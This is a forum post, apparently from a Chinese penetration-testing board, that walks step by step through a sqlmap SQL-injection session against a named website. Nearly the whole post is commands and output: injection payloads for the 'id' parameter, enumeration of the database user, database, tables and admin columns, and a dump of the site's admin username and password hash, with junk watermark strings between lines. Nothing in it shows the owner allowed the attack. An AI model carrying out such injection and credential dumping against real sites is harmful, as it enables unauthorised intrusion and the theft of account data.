中国网络渗透测试联盟
标题:
sqlmap实例注入mysql
[打印本页]
作者:
admin
时间:
2013-4-4 22:18
标题:
sqlmap实例注入mysql
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
9 Y3 r. l. p3 x6 E$ C# c( d
ms "Mysql" --current-user /* 注解:获取当前用户名称
2 m* F3 P! B' }2 Z' Y9 {: ^
sqlmap/0.9 - automatic SQL injection and database takeover tool
: W4 f. z; j+ Z$ |
http://sqlmap.sourceforge.net
starting at: 16:53:54
' G% y/ e& ] }( o. F
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
, Y" N( @) d9 }' D" I
session file
w$ q. x; p" z
[16:53:54] [INFO] resuming injection data from session file
( S2 h2 Z% q5 J
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 ?: M3 O* f( v) i; i
[16:53:54] [INFO] testing connection to the target url
' l3 d) _, i* s% w% F8 _: P( |
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
5 S7 W6 ~3 A* V; A8 |# ?
sts:
" d- Y0 r' U% r5 S: e
---
+ J+ B% W" `0 V
Place: GET
- E; F3 w; h) ]3 d$ e. q/ F! \5 }
Parameter: id
d0 d* S# I$ K4 I8 o; m
Type: boolean-based blind
# \ h" f' B+ X- R, o1 W! F
Title: AND boolean-based blind - WHERE or HAVING clause
8 V- W+ r. x' Q# N+ y4 a& p
Payload: id=276 AND 799=799
- E4 B; T. d+ R7 a1 e" V2 q( P: J
Type: error-based
v* c* |# D0 c E7 p D
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
9 T) B7 n4 v8 @7 P$ [
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
9 d# a; I( n! P6 D J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
5 D2 q, V9 ~0 H9 V
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. `+ o5 Y& N0 Y1 s8 w, E
Type: UNION query
9 I% U C, h/ \* \% x
Title: MySQL UNION query (NULL) - 1 to 10 columns
% e4 d# `3 q& u1 R
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
' I& q6 p9 H7 }
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
* I" e, @) Z4 d6 u4 X; [
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; z: \# @/ Y- J/ M5 F- X- |
Type: AND/OR time-based blind
0 ]2 A/ o% C0 b
Title: MySQL > 5.0.11 AND time-based blind
; `' n3 O, P) ]6 ]
Payload: id=276 AND SLEEP(5)
! S. I$ B1 O+ E: B6 d( o5 g: e" A, ]! K0 ^
---
# a2 \. M$ {5 Z9 a( l3 C, `
[16:53:55] [INFO] the back-end DBMS is MySQL
K0 u \5 B' Y0 {' c3 ^
web server operating system: Windows
: E# @: M: A3 B1 e) I7 L
web application technology: Apache 2.2.11, PHP 5.3.0
7 }8 C1 d; Y1 X+ O2 i) C2 d
back-end DBMS: MySQL 5.0
' c! @8 D% U# Y
[16:53:55] [INFO] fetching current user
' H5 ~. s* B9 a* l( \: F
current user: 'root@localhost'
2 W7 N) w, }- {' {: T0 c. V
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
n9 K) p) D( o% a, L
tput\
www.wepost.com.hk
'
shutting down at: 16:53:58
* O( o( p4 z) Y; K0 ?
. Q1 C) l$ Z5 o
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
3 f( b+ h& H2 m' K& h
ms "Mysql" --current-db /*当前数据库
( V& w/ X- Y5 }
sqlmap/0.9 - automatic SQL injection and database takeover tool
! ^4 F" K9 R) q* p" s
http://sqlmap.sourceforge.net
starting at: 16:54:16
5 q( a3 {7 n# w& z$ [
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
% W7 M5 n; _3 w- O2 O: |
session file
$ O1 g- |: g3 T; s; H4 a% y2 F. S
[16:54:16] [INFO] resuming injection data from session file
2 p3 ~" p2 I( m8 [( C x
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
1 j( h/ k5 L: Y' G: u$ o
[16:54:16] [INFO] testing connection to the target url
, M( D8 d7 |9 z9 Q2 i# r" F9 `
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
2 {8 p' G" Z; V$ ~/ R! ~
sts:
% z& M. O9 O4 `& O, q/ c! E
---
6 o9 Z) C8 v/ c9 b5 c% q- w
Place: GET
& M! [ f+ S6 o' i; b* }
Parameter: id
7 r( o) [9 C4 w) P( P! k/ z) g# i
Type: boolean-based blind
" O# z5 o t. x; t! l& m
Title: AND boolean-based blind - WHERE or HAVING clause
4 f l$ J+ C4 L/ }7 z
Payload: id=276 AND 799=799
* H6 c7 X. V8 d& [# c/ j/ _7 ?2 N
Type: error-based
" P: ]4 }* k) i/ d: a" ~
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
' ^, o5 |/ R7 `! j
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
- S, y8 M; I. r$ {
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
# y/ {. w2 a8 @
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- U q- C+ S2 b3 y7 G/ A1 r! P) z& J" i
Type: UNION query
- W7 k9 H0 x; y' I
Title: MySQL UNION query (NULL) - 1 to 10 columns
# z! [1 d! W0 n$ b) I5 R
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 y/ `/ ?2 a) I% k; w7 y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 h0 u4 _, v- g+ l+ f; j
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) P$ N% y3 k# ?7 y
Type: AND/OR time-based blind
5 Y* B; [% m. O! Y# h5 h
Title: MySQL > 5.0.11 AND time-based blind
* N% N# @8 E3 B& y1 I! ]4 e
Payload: id=276 AND SLEEP(5)
/ v! A: D7 h3 v9 j5 ?: D
---
$ A* L& Y' M* _2 f) J
[16:54:17] [INFO] the back-end DBMS is MySQL
P; n, F1 n b. g! ~/ x& i
web server operating system: Windows
* E* n7 _* \0 i$ h3 ^! r
web application technology: Apache 2.2.11, PHP 5.3.0
' i, ~- F$ t/ B; d! n
back-end DBMS: MySQL 5.0
7 f+ L* o" Y& P2 M
[16:54:17] [INFO] fetching current database
- r% C# ^2 C+ z# l' }$ q- A, P) F: A* F
current database: 'wepost'
3 Q; p1 @7 L8 F& X/ z7 G
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
9 C0 u* z9 _4 e2 {
tput\
www.wepost.com.hk
'
shutting down at: 16:54:18
# Y' k$ P# z5 L! P
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
* F% t/ }. L8 u3 x1 ?& N
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
) `0 p5 O7 ?) H3 m- ~* t
sqlmap/0.9 - automatic SQL injection and database takeover tool
9 A+ S a F2 E) D
http://sqlmap.sourceforge.net
starting at: 16:55:25
8 I. {- m8 J3 y' m3 G& d
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\session' as
: {; F0 X' L, y) L% t9 M& T
session file
- f2 b Y% {# t* U m h/ ^3 f1 S
[16:55:25] [INFO] resuming injection data from session file
- }5 Q) T p6 m
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
; ~% Z. M; ~, A4 y1 \5 v
[16:55:25] [INFO] testing connection to the target url
+ m t$ p! e F; l5 {
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
; k8 F* [( D9 Q# V
sts:
7 o0 e8 C: s. i* `7 U3 B- D8 }% P
---
9 ~' J; J J; K* {% q/ I
Place: GET
6 A8 o+ I' |& G
Parameter: id
) Y! h' @$ b: v4 X Q& O
Type: boolean-based blind
; f8 K+ d: w! f. z3 T. O( x* H
Title: AND boolean-based blind - WHERE or HAVING clause
% d6 \& u# q w( G1 q
Payload: id=276 AND 799=799
, j+ F4 j1 w2 t
Type: error-based
$ P! S4 b1 c; d% {, L7 Y
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
3 L3 l, g+ B! y0 a
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
. j* V. O' e$ |' j( ~% v
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
, ]# \# z0 n! d; [4 \6 M' O4 ~
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% l8 g j; c9 c( z, K
Type: UNION query
4 \9 m& {! i, W: ~
Title: MySQL UNION query (NULL) - 1 to 10 columns
! ?6 z) p9 Q( R- W: u
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
3 W) X0 M& w# `4 g
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# a9 Y" i6 Y% D0 r0 _: S
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
' J' ?/ G6 F4 P0 K
Type: AND/OR time-based blind
, k) p* V6 w3 Q; v- z$ |3 t: p1 r
Title: MySQL > 5.0.11 AND time-based blind
7 A7 x) r: N2 C$ c( D
Payload: id=276 AND SLEEP(5)
( Z$ F, C' ]# A2 L* j0 r1 @; L
---
: K3 O$ b2 }! g, M
[16:55:26] [INFO] the back-end DBMS is MySQL
0 D2 c% a1 M# `! ?+ g2 f$ F1 n
web server operating system: Windows
- C6 p" \# {, B% n
web application technology: Apache 2.2.11, PHP 5.3.0
6 f: D/ t* _7 i3 ]& d) G
back-end DBMS: MySQL 5.0
; v. u, j* W3 G
[16:55:26] [INFO] fetching tables for database 'wepost'
) c2 m' K5 _; }8 r2 J8 |7 J
[16:55:27] [INFO] the SQL query used returns 6 entries
# }# _5 Q0 q- N2 I$ g/ x; s
Database: wepost
h3 J" }. T) v3 A* ~6 _
[6 tables]
! N. {& m L+ B
+-------------+
! K' o5 z( Q" v: b
| admin |
1 ]. x2 C% I# A5 H2 u( o9 Y
| article |
i" C/ e. a' H4 O
| contributor |
- e r6 ~! {1 Z# `
| idea |
) f. {- d$ E) m2 _% P
| image |
E2 a0 e) H( Y6 P: R2 i( B5 R3 {( x
| issue |
+ `. m; l6 A9 k$ T
+-------------+
, w% l0 c6 D7 @% q5 P! c7 i
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
, E3 a) P/ A, e* {/ e
tput\
www.wepost.com.hk
'
shutting down at: 16:55:33
* |0 }* }+ W) ^/ u- S% v
s, k" R& r; k* H) W7 \1 M9 L
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
6 R @8 y1 c* I% e/ h: ?% X$ r3 ~
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
" l; ^8 S. J, ]2 R; T
sqlmap/0.9 - automatic SQL injection and database takeover tool
& F5 ]9 n* x: ?- H
http://sqlmap.sourceforge.net
starting at: 16:56:06
9 a" \1 l- T1 [# |- y* e
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
; \: K p S* U3 Y1 |4 s5 ]
sts:
+ [" ]8 F( Z3 v( Q3 Y
---
, R7 d H! Z- C+ X; N
Place: GET
. w- J7 [4 ~0 j% ]7 v6 s" i( z
Parameter: id
3 x) E8 q: |' Q) R) Z
Type: boolean-based blind
6 j4 \4 B& d6 R/ j1 T% j5 D
Title: AND boolean-based blind - WHERE or HAVING clause
* M# R! S- H5 G; c* ] K* v
Payload: id=276 AND 799=799
$ o& a% U" ~5 B
Type: error-based
- q, k& Q$ k, A# P9 ^, X$ Z E% `+ W
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
! p" z1 `9 R/ z* h2 d: T" h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
+ c. Z* v9 @; {, T
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
6 _3 [0 |/ s# j. Z- E$ }- {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
. @, {% h. I+ Q) | k$ j6 r& W
Type: UNION query
* E. ]# I; g1 E7 N) H! @6 e
Title: MySQL UNION query (NULL) - 1 to 10 columns
6 ]$ S4 u& C" l, ~, n
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
) e2 X# a5 B2 m: e+ E+ G! ?" y
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
7 x: i0 j0 F( R+ P7 i) ?7 I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
6 G6 j7 W5 P# a0 `0 L8 {$ h, ^
Type: AND/OR time-based blind
. B3 Y0 s. \4 }8 M& i4 i; w
Title: MySQL > 5.0.11 AND time-based blind
- _! i# @; |6 c3 O! \6 ?$ Z. D% z" `
Payload: id=276 AND SLEEP(5)
5 {! U8 Q* Q3 n
---
: d! ?( L9 z4 @
web server operating system: Windows
0 m" b9 J) i: u9 h3 R2 t
web application technology: Apache 2.2.11, PHP 5.3.0
( D$ s2 W2 U7 G% o4 @$ D" ?8 ?
back-end DBMS: MySQL 5.0
6 Y" j, b: \% Q' O$ P
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\
www.wepost.com.hk
\se
! r+ v# L. k j9 ?/ \: b
ssion': wepost, wepost
+ O5 N; ]$ z# m1 E4 H! ~; K6 E- V
Database: wepost
7 r; O" `' ^" ^: B# X9 u
Table: admin
( T( I9 U5 ]3 T h, j
[4 columns]
( d2 \. Y2 S5 c7 {! _. w
+----------+-------------+
! w, ~6 M2 a$ q) t
| Column | Type |
3 `# E W, ?3 I% g
+----------+-------------+
4 \. [" F, G0 X
| id | int(11) |
1 X* m9 E& l. s/ ^- T
| password | varchar(32) |
; `! i' F B2 Y3 R
| type | varchar(10) |
* H2 ^$ E' ~9 S: e* M
| userid | varchar(20) |
3 J1 p! g! f3 k6 C: H3 z
+----------+-------------+
2 O7 F, H) L3 a8 x1 u" e( d/ r
shutting down at: 16:56:19
: X+ N k4 A. ^$ U
* o0 H! r# i7 ]* O7 w' I% \
D:\Python27\sqlmap>sqlmap.py -u
http://www.wepost.com.hk/article.php?id=276
--db
1 r G3 G! n! D
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
& R& Z2 R' k; ^/ V* j
sqlmap/0.9 - automatic SQL injection and database takeover tool
. I! N. l" l; n+ @/ |! b7 S9 z9 V
http://sqlmap.sourceforge.net
starting at: 16:57:14
* h, I1 C# p+ g- v
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ U* p. y& P: k4 z) Y
sts:
+ M0 s, H) q: R4 {# Q# v
---
/ m7 U$ I* N! F9 z5 [9 [
Place: GET
; c$ M! @9 l v1 z# V
Parameter: id
5 R/ l1 \/ N d8 n3 s. S+ q
Type: boolean-based blind
[) n0 R: l+ V. R, S. i
Title: AND boolean-based blind - WHERE or HAVING clause
1 H, `. ]3 F$ ]' |
Payload: id=276 AND 799=799
/ \0 |2 C& j( N2 X
Type: error-based
: _9 v! @2 r% A+ \ s2 @
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
5 S6 Y& X5 d4 v H l7 j. t: ]- `9 d
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
7 O1 Q. p( a' E9 J; v
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
' D. a; _* }' a% P% x0 {# d
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
$ w' a) u, G# c& ~9 E4 Z
Type: UNION query
& J3 U' d! K! K
Title: MySQL UNION query (NULL) - 1 to 10 columns
' O: C* ~& G% _- ^# t) J
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
4 w; W( n" P& z- f( }/ J
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
+ f6 H6 Z) y+ @% t& P1 M
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
4 Z5 R# j2 @2 E9 e( K
Type: AND/OR time-based blind
- `& }/ }2 Q; N! w! |1 B" R
Title: MySQL > 5.0.11 AND time-based blind
+ a7 Y! E( E, w! w4 L
Payload: id=276 AND SLEEP(5)
1 o/ ?7 t$ [8 V+ f, J
---
- n6 ^3 [) }2 D; B6 @2 T" i
web server operating system: Windows
/ P, K5 Y0 c6 z
web application technology: Apache 2.2.11, PHP 5.3.0
T* }8 s& y/ O7 {
back-end DBMS: MySQL 5.0
, S# X7 N# |2 w" Y7 y
recognized possible password hash values. do you want to use dictionary attack o
9 g v0 |9 W6 R8 G' J. S# V
n retrieved table items? [Y/n/q] y
" ]* t; Z+ D/ Z
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
, m* t8 H) }% b: \" Z( ?$ T$ `
do you want to use common password suffixes? (slow!) [y/N] y
X! `! Z* ` h. C3 p
Database: wepost
h0 t0 z! E6 Q' ^$ y. R
Table: admin
4 t' }4 q3 \: B- o( [
[1 entry]
: c9 T# e3 k- p" V( @/ ^( @1 w' o5 N
+----------------------------------+------------+
: t0 }* l! K" W+ d2 c% A
| password | userid |
! q; H$ x% S% g: V. k. t
+----------------------------------+------------+
' [- f* g! l' B) B
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
3 V* V1 }4 Z. U6 n8 o
+----------------------------------+------------+
6 O8 X8 F- r; e3 b* ?6 ]* L5 C2 @8 U
shutting down at: 16:58:14
( e" G5 @$ i, ~! ]$ @' ]
% I% x$ P+ p3 ?! G7 ]$ g9 d7 K' V
D:\Python27\sqlmap>
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2